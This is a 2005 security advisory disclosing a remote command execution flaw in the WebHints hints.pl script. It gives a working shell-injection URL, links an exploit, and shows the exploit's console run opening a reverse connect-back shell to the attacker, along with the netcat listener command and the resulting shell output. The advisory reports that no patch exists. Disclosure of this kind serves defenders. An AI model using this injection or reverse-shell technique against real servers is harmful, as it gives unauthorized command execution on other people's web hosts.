MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command Execution Vulnerability 06/11/2005 MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command Execution Vulnerability Published: 06 11 2005 Released: 06 11 2005 Name: WebHints Affected Systems: <= 1.03 Issue: Remote Command Execution Vulnerability Author: Emanuele "MadSheep" Gentili Vendor: http://awsd.com/scripts/ Description *********** Madroot Security group has discovered a flaw in WebHints <= 1.02. There is a vulnerability in the current version of WebHints. This issue occurs due to insufficient sanitization of externally supplied data to the hints.pl script that allows a remote user to pass an arbitrary shell command which will be executed by the script. An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script. Details ******* It's possibile for a remote attacker to retrieve any file from a webserver and execute it. Multiple files are affected with this problem. For example try this: http://www.website/directory/hints.pl?|uname -a;id;uptime;pwd| POF ******* Exploit: http://madsheep.altervista.org/M4DR007-hints.pl emanuele@blackbox:~$ perl new.pl ~~ www.madroot.edu.ms Security Group ~~ WebHints Software hints.cgi Remote Command Execution Vulnerability Affected version: <= all ~~ code by MadSheep ~~ 06.11.2005 hostname: localhost port: (default: 80) 80 path: (/cgi-bin/) /cgi-bin/ your ip (for reverse connect): 127.0.0.1 your port (for reverse connect): 7350 ~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~ [*] try to exploiting... [*] OK! [*] NOW, run in your box: nc -l -vv -p 7350 [*] starting connect back on 127.0.0.1 :7350 [*] DONE! [*] Look netcat windows and funny ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WARNING - WARNING - WARNING - WARNING ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If connect back shell not found: - you do not have privileges to write in /tmp - Shell not vulnerable We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk emanuele@blackbox:~$ emanuele@blackbox:~$ nc -l -vv -p 7350 uid=1001(madhseep) gid=1001(madsheep) grupos=1001(madsheep) enJoy Solution ********* The vendor has been contacted and a patch was not yet produced. Credits ******* Emanuele "MadSheep" Gentili - emanuele@orvietolug.org - www.madsheep.edu.ms Come cheer us at #madroot on Freenode ( irc.freenode.net ) (C) 2004 Copyright by madroot Security Group